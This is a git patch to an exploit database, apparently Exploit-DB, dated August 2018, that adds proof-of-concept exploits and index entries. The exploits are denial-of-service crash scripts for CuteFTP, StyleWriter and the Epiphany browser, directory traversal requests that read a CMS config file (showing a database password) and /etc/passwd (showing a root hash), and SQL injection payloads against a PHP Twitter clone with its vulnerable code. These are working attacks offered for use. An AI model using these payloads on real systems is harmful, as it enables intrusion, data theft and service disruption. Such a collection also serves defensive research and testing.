From 4d43b968d872fc6171885dbf3f97fec7b0b52cf4 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 24 Aug 2018 05:01:53 +0000 Subject: [PATCH] DB: 2018-08-24 7 changes to exploits/shellcodes CuteFTP 8.3.1 - Denial of Service (PoC) Epiphany Web Browser 3.28.1 - Denial of Service (PoC) StyleWriter 4 1.0 - Denial of Service (PoC) CMS ISWEB 3.5.3 - Directory Traversal Twitter-Clone 1 - 'code' SQL Injection PCViewer vt1000 - Directory Traversal --- exploits/linux/dos/45249.txt | 84 ++++++++++++++++++++++++++++ exploits/php/webapps/45155.txt | 26 +++++++++ exploits/php/webapps/45247.txt | 64 +++++++++++++++++++++ exploits/windows/local/45171.vb | 2 +- exploits/windows/webapps/45248.txt | 33 +++++++++++ exploits/windows_x86-64/dos/45246.py | 28 ++++++++++ exploits/windows_x86/local/45250.py | 27 +++++++++ files_exploits.csv | 6 ++ 8 files changed, 269 insertions(+), 1 deletion(-) create mode 100644 exploits/linux/dos/45249.txt create mode 100644 exploits/php/webapps/45155.txt create mode 100644 exploits/php/webapps/45247.txt create mode 100644 exploits/windows/webapps/45248.txt create mode 100755 exploits/windows_x86-64/dos/45246.py create mode 100755 exploits/windows_x86/local/45250.py diff --git a/exploits/linux/dos/45249.txt b/exploits/linux/dos/45249.txt new file mode 100644 index 000000000..08501cffd --- /dev/null +++ b/exploits/linux/dos/45249.txt @@ -0,0 +1,84 @@ +# Exploit Title: Epiphany Web Browser 3.28.1 - Denial of Service (PoC) +# Author: Dhiraj Mishra +# Date: 2018-08-23 +# Software: https://projects-old.gnome.org/epiphany/ +# Version: 3.28.1 +# CVE: N/A +# Tested on: Ubuntu 18 64bit + +# Steps to reproduce: +1. Open epiphany browser +2. Bookmark any random page +3. Then navigate to bookmark properties set: + Name = Crash + Address = javascript:window.open('javascript:document.write("");'); +4. Browser any URL's and try to open the above bookmark +5. The browser crashes + +# Below backtrace for your reference. + +$ gdb epiphany +GNU gdb (Ubuntu 8.1-0ubuntu3) 8.1.0.20180409-git +Copyright (C) 2018 Free Software Foundation, Inc. +License GPLv3+: GNU GPL version 3 or later +This is free software: you are free to change and redistribute it. +There is NO WARRANTY, to the extent permitted by law. Type "show copying" +and "show warranty" for details. +This GDB was configured as "x86_64-linux-gnu". +Type "show configuration" for configuration details. +For bug reporting instructions, please see: +. +Find the GDB manual and other documentation resources online at: +. +For help, type "help". +Type "apropos word" to search for commands related to "word"... +Reading symbols from epiphany...(no debugging symbols found)...done. +(gdb) r +Starting program: /usr/bin/epiphany +[Thread debugging using libthread_db enabled] +Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". +[New Thread 0x7fffe08b6700 (LWP 9295)] +[New Thread 0x7fffdee4b700 (LWP 9296)] +[New Thread 0x7fffde64a700 (LWP 9297)] +[New Thread 0x7fffdcdcf700 (LWP 9298)] +[New Thread 0x7fff8fffd700 (LWP 9299)] +[New Thread 0x7fff8f7fc700 (LWP 9300)] +[New Thread 0x7fff8effb700 (LWP 9301)] +[New Thread 0x7fff8e38b700 (LWP 9302)] +[New Thread 0x7fff8db8a700 (LWP 9303)] +[New Thread 0x7fff8d389700 (LWP 9305)] +[New Thread 0x7fff77b0a700 (LWP 9310)] +[New Thread 0x7fff7598c700 (LWP 9320)] +[New Thread 0x7fff7518b700 (LWP 9321)] +[New Thread 0x7fff7498a700 (LWP 9327)] +[New Thread 0x7fff7698c700 (LWP 9334)] +[New Thread 0x7fff5ffff700 (LWP 9335)] +[New Thread 0x7fff5f7fe700 (LWP 9336)] +[New Thread 0x7fff5effd700 (LWP 9337)] +[New Thread 0x7fff5e7fc700 (LWP 9338)] +[New Thread 0x7fff5dffb700 (LWP 9339)] +[Thread 0x7fff8db8a700 (LWP 9303) exited] +[Thread 0x7fff8e38b700 (LWP 9302) exited] +[Thread 0x7fff5e7fc700 (LWP 9338) exited] +[Thread 0x7fff7698c700 (LWP 9334) exited] +[Thread 0x7fff5f7fe700 (LWP 9336) exited] +[Thread 0x7fff5effd700 (LWP 9337) exited] +[Thread 0x7fff5dffb700 (LWP 9339) exited] +[Thread 0x7fff5ffff700 (LWP 9335) exited] +Error scanning plugin /usr/lib/mozilla/plugins/libpepflashplayer.so, /usr/lib/x86_64-linux-gnu/webkit2gtk-4.0/WebKitPluginProcess returned 256 exit status +[New Thread 0x7fff5ffff700 (LWP 9399)] +[Thread 0x7fff7498a700 (LWP 9327) exited] +[New Thread 0x7fff7498a700 (LWP 9402)] +[Thread 0x7fff7498a700 (LWP 9402) exited] + +Thread 22 "pool" received signal SIGSEGV, Segmentation fault. +[Switching to Thread 0x7fff5ffff700 (LWP 9399)] +0x00007ffff7b75db7 in ?? () from /usr/lib/x86_64-linux-gnu/epiphany-browser/libephymain.so +(gdb) bt +#0 0x00007ffff7b75db7 in () at /usr/lib/x86_64-linux-gnu/epiphany-browser/libephymain.so +#1 0x00007ffff7079be6 in () at /usr/lib/x86_64-linux-gnu/libgio-2.0.so.0 +#2 0x00007ffff73fe7d0 in () at /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0 +#3 0x00007ffff73fde05 in () at /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0 +#4 0x00007fffefc206db in start_thread (arg=0x7fff5ffff700) at pthread_create.c:463 +#5 0x00007ffff5e4c88f in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:95 +(gdb) \ No newline at end of file diff --git a/exploits/php/webapps/45155.txt b/exploits/php/webapps/45155.txt new file mode 100644 index 000000000..4ad725383 --- /dev/null +++ b/exploits/php/webapps/45155.txt @@ -0,0 +1,26 @@ +# Exploit Title: CMS ISWEB 3.5.3 - Directory Traversal +# Date: 2018-08-01 +# Exploit Author: Thiago "thxsena" Sena +# Vendor Homepage: http://www.isweb.it +# Version: 3.5.3 +# Tested on: Linux +# CVE : N/A + +# PoC: +# CMS ISWEB 3.5.3 is vulnerable to directory traversal and local file download, +# as demonstrated by + +moduli/downloadFile.php?file=oggetto_documenti/../.././inc/config.php + +# Download and open it. +$dati_db = array( + 'tipo' => 'mysql', + 'host' => 'localhost', + 'user' => 'networkis', + 'password' => 'guybrush77', + 'database' => 'networkis', + 'database_offline' => '', + 'persistenza' => FALSE, + 'prefisso' => '', + 'like' => 'LIKE' +); \ No newline at end of file diff --git a/exploits/php/webapps/45247.txt b/exploits/php/webapps/45247.txt new file mode 100644 index 000000000..e07c41df3 --- /dev/null +++ b/exploits/php/webapps/45247.txt @@ -0,0 +1,64 @@ +# Exploit Title: Twitter-Clone 1 - 'code' SQL Injection +# Date: 2018-08-22 +# Exploit Author: L0RD +# Vendor Homepage: https://github.com/Fyffe/PHP-Twitter-Clone/ +# Version: 1 +# CVE: N/A +# Tested on: Win 10 +# vulnerable files : [mailactivation.php , stalkers.php , search.php] +# vulnerable parameters : [name , code , id] + +# 1) search.php : +# vulnerable parameter : name +# Type : Error-based +# Payload : + +%' AND extractvalue(1,concat(0x3a,database(),0x3a))%23 + +# vulnerable code : +if($_GET['name']!=""){ +$what = $_GET['name']; +include "connect.php"; +$users = mysqli_query($con, "SELECT id, username, followers, following, +tweets + FROM users + WHERE username LIKE '%$what%' + ORDER BY username ASC + LIMIT 0, 10 +"); + +# 2) mailactivation.php : +# vulnerable parameter : code +# Type : Union query +# Payload : + +' UNION SELECT 1,user(),3,4,5,6%23 + +# vulnerable code : +include "connect.php"; +$givenname = $_GET['username']; +$givencode = $_GET['code']; +$query = mysqli_query($con, "SELECT code, active + FROM users + WHERE code = '$givencode' AND username = '$givenname' + "); +$row = mysqli_fetch_assoc($query); +$wantedcode = $row['code']; + +# 3) stalkers.php : +# vulnerable parameter : id +# Type : Union query +# Payload : + +' UNION SELECT 1,2,user(),4,5,6 + +# vulnerable code : +if ($_GET['id'] != "") { +$theid = $_GET['id']; +include "connect.php"; +$stalked = mysqli_query($con, "SELECT id, username, followers, following + FROM users + WHERE id = '$theid' +"); +$row1 = mysqli_fetch_assoc($stalked); +$usern = $row1['username']; \ No newline at end of file diff --git a/exploits/windows/local/45171.vb b/exploits/windows/local/45171.vb index 57c4e988d..117589bcc 100644 --- a/exploits/windows/local/45171.vb +++ b/exploits/windows/local/45171.vb @@ -2,7 +2,7 @@ # Date: 2018-08-08 # Exploit Author: VortexNeoX64 # Vendor Homepage: https://soroush-app.ir -# Software Link: https://soroush-app.ir/UploadedData/Soroush.exe +# Software Link: http://54.36.43.176/SoroushSetup0.17.0.exe # Version: 0.17.0 BETA # Tested on: Windows 10 1803 and windows server 2016 14393 diff --git a/exploits/windows/webapps/45248.txt b/exploits/windows/webapps/45248.txt new file mode 100644 index 000000000..65357a50a --- /dev/null +++ b/exploits/windows/webapps/45248.txt @@ -0,0 +1,33 @@ +# Exploit Title: PCViewer vt1000 - Directory Traversal +# Exploit Author: Berk Dusunur +# Google Dork: N/A +# Type: Hardware +# Date: 2018-07-21 +# Vendor Homepage: N/A +# Software Link: http://www.softpedia.com/get/System/File-Management/Pc-Viewer.shtml +# Affected Version: vt1000 +# Tested on: Parrot OS +# CVE : N/A + +# Proof Of Concept + +GET Request + +GET ../../../../../../../../../../../../etc/passwd HTTP/1.1 +Host: target:8080/ +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) +Gecko/20100101 Firefox/61.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 + +Response + +HTTP/1.1 200 OK +Server:Cross Web Server +Content-length: 59 +Content-type: application/octet-stream + +root:$1$$qRPK7m23GJusamGpoGLby/:0:0::/root:/bin/sh \ No newline at end of file diff --git a/exploits/windows_x86-64/dos/45246.py b/exploits/windows_x86-64/dos/45246.py new file mode 100755 index 000000000..12e773718 --- /dev/null +++ b/exploits/windows_x86-64/dos/45246.py @@ -0,0 +1,28 @@ +# Exploit Title : CuteFTP 8.3.1 - Denial Of Service (PoC) +# Exploit Author : Ali Alipour +# WebSite : Alipour.it +# Date: 2018-08-22 +# Vendor Homepage : http://www.cuteftp.com/ +# Software Link Download : https://filehippo.com/download_cuteftp_pro/4518/ +# Tested on : Windows 10 - 64-bit + +# Steps to Reproduce +# Run the python exploit script, it will create a new +# file with the name "exploit.txt" just copy the text inside "exploit.txt" +# and start the CuteFTP program. +# In the new window click "File" > "Connect" > "Connect To URL" . +# Now Paste the content of "exploit.txt" into the field: " Connect To URL ". +# Click "OK" and you will see a crash. + +#!/usr/bin/python + +buffer = "A" * 7000 +payload = buffer +try: + f=open("exploit.txt","w") + print "[+] Creating %s bytes evil payload.." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows_x86/local/45250.py b/exploits/windows_x86/local/45250.py new file mode 100755 index 000000000..0da1e3e87 --- /dev/null +++ b/exploits/windows_x86/local/45250.py @@ -0,0 +1,27 @@ +# Exploit Title: StyleWriter 4 1.0 - Denial of Service (PoC) +# Author: Gionathan "John" Reale +# Discovey Date: 2018-08-23 +# Homepage: http://www.editorsoftware.com +# Software Link: http://www.editorsoftware.com/StyleWriter_Download.php +# Tested Version: 1.0 +# Tested on OS: Windows 7 32-bit +# Steps to Reproduce: Run the python exploit script, it will create a new +# file with the name "exploit.txt" just copy the text inside "exploit.txt" +# and start the program. In the new window click "Tools" >"Add Pattern...". +# Now in the new window paste the content of +# "exploit.txt" into the following fields:"Pattern to Find" & "Advice Message". +# Click "Add" and you will see a crash. + +#!/usr/bin/python + +buffer = "A" * 6000 + +payload = buffer +try: + f=open("exploit.txt","w") + print "[+] Creating %s bytes evil payload.." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 0c28339c3..484e23d18 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6064,6 +6064,8 @@ id,file,description,date,author,type,platform,port 45239,exploits/windows_x86-64/dos/45239.py,"UltraISO 9.7.1.3519 - Denial Of Service (PoC)",2018-08-22,"Ali Alipour",dos,windows_x86-64, 45241,exploits/windows_x86/dos/45241.py,"Easyboot 6.6.0 - Denial Of Service (PoC)",2018-08-22,"Gionathan Reale",dos,windows_x86, 45245,exploits/windows_x86/dos/45245.py,"Softdisk 3.0.3 - Denial Of Service (PoC)",2018-08-22,"Gionathan Reale",dos,windows_x86, +45246,exploits/windows_x86-64/dos/45246.py,"CuteFTP 8.3.1 - Denial of Service (PoC)",2018-08-23,"Ali Alipour",dos,windows_x86-64, +45249,exploits/linux/dos/45249.txt,"Epiphany Web Browser 3.28.1 - Denial of Service (PoC)",2018-08-23,"Dhiraj Mishra",dos,linux, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -9896,6 +9898,7 @@ id,file,description,date,author,type,platform,port 45235,exploits/windows_x86/local/45235.py,"Project64 2.3.2 - Buffer Overflow (SEH)",2018-08-22,"Shubham Singh",local,windows_x86, 45243,exploits/linux/local/45243.txt,"Ghostscript - Multiple Vulnerabilities",2018-08-22,"Google Security Research",local,linux, 45244,exploits/windows/local/45244.txt,"Windows 10 Diagnostics Hub Standard Collector Service - Privilege Escalation",2018-08-22,"Atredis Partners",local,windows, +45250,exploits/windows_x86/local/45250.py,"StyleWriter 4 1.0 - Denial of Service (PoC)",2018-08-23,"Gionathan Reale",local,windows_x86, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -39817,6 +39820,7 @@ id,file,description,date,author,type,platform,port 45152,exploits/aspx/webapps/45152.txt,"Sitecore.Net 8.1 - Directory Traversal",2018-08-06,Chris,webapps,aspx, 45153,exploits/java/webapps/45153.txt,"LAMS < 3.1 - Cross-Site Scripting",2018-08-06,"Nikola Kojic",webapps,java,8080 45154,exploits/php/webapps/45154.html,"onArcade 2.4.2 - Cross-Site Request Forgery (Add Admin)",2018-08-06,r3m0t3nu11,webapps,php,443 +45155,exploits/php/webapps/45155.txt,"CMS ISWEB 3.5.3 - Directory Traversal",2018-08-06,"Thiago Sena",webapps,php, 45156,exploits/php/webapps/45156.txt,"Monstra 3.0.4 - Cross-Site Scripting",2018-08-06,"Nainsi Gupta",webapps,php,80 45158,exploits/java/webapps/45158.txt,"Wavemaker Studio 6.6 - Server-Side Request Forgery",2018-08-06,"Gionathan Reale",webapps,java, 45164,exploits/php/webapps/45164.txt,"Monstra-Dev 3.0.4 - Cross-Site Request Forgery (Account Hijacking)",2018-08-07,"Nainsi Gupta",webapps,php, @@ -39846,3 +39850,5 @@ id,file,description,date,author,type,platform,port 45236,exploits/hardware/webapps/45236.txt,"ZyXEL VMG3312-B10B - Cross-Site Scripting",2018-08-22,"Samet ŞAHİN",webapps,hardware, 45237,exploits/php/webapps/45237.php,"KingMedia 4.1 - Remote Code Execution",2018-08-22,"Efrén Díaz",webapps,php, 45242,exploits/hardware/webapps/45242.txt,"Geutebrueck re_porter 16 - Cross-Site Scripting",2018-08-22,"Kamil Suska",webapps,hardware, +45247,exploits/php/webapps/45247.txt,"Twitter-Clone 1 - 'code' SQL Injection",2018-08-23,L0RD,webapps,php, +45248,exploits/windows/webapps/45248.txt,"PCViewer vt1000 - Directory Traversal",2018-08-23,"Berk Dusunur",webapps,windows,